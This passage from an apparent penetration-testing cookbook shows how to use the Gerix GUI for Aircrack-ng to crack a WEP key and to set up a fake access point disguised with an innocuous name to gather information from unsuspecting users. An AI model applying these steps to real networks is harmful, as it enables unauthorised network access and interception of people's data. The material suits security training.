Click on the Aircrack-ng – Decrypt WEP Password button. That's it! How it works... In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitoring mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we then used Chop Chop to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forced the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP secured network. Accessing clients using a fake AP In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of creating a fake AP with Gerix. Let's navigate to the directory where Gerix is located: cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, press the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults on each of the other options. To start the fake access point,click on the Start Face Access Point button. That's it! How it works... In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. The reason fake access points are a great tool to use is that to your victim, they appear to be a legitimate access point, thus making it trusted by the user. Using Gerix, we were able to automate the creation of setting up a fake access point in a few short clicks.
Read more
  • 0
  • 0
  • 37317
Modal Close icon
Modal Close icon